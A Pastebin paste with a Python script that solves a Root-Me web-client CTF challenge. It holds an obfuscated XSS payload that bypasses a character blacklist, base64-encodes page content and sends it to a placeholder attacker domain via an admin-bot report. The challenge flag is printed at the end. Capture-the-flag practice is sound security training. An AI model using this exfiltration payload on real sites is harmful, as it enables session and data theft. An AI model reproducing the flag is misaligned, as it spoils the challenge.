Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from urllib.parse import quote_plus, urljoin, urlparse, quote, unquote, unquote_to_bytes, quote_from_bytes
- import requests
- headers = {
- 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
- # Accept-Encoding: gzip, deflate
- 'Accept-Language': 'en-US,en;q=0.9',
- 'Cache-Control': 'no-cache',
- # Connection: keep-alive
- # Host: challenge01.root-me.org
- 'Pragma': 'no-cache',
- 'Upgrade-Insecure-Requests': '1',
- 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36',
- }
- def debug(resp):
- print(resp.__dict__)
- def create_form(user,debug_=False):
- global headers
- url = 'http://challenge01.root-me.org/web-client/ch8/page'
- resp = requests.request("GET",url=url,params={'user':user},headers=headers)
- if debug_:debug(resp)
- return resp
- def report_admin(url,debug_=False):
- global headers
- url_admin = 'http://challenge01.root-me.org/web-client/ch8/report' ## post url
- resp = requests.request("POST",url_admin,data={"url":url},headers=headers)
- if debug_:debug(resp)
- return resp
- if __name__=='__main__':
- ## <img src=x onerror='alert(1)'>
- ## black list ':', 'script'
- domain_hacker = 'hacker_domain'
- craft = f'''<img src=x onerror="document.location=('htt'.concat(String.fromCharCode(112,115,58,47,47)).concat('{domain_hacker}/?c=').concat(escape(btoa(document.body.innerHTML))))">'''
- # craft = f'''<img src=x onerror="document.location=('//{domain_hacker}?c='+window.btoa(document.getElementsByClassName("message")[0].innerHTML)>'''
- resp = create_form(craft)
- url = unquote(resp.url)
- print(url)
- print(report_admin(url).text)
- ## CSP_34SY_T0_BYP4S_W1TH_SCR1PT
Add Comment
Please, Sign In to add comment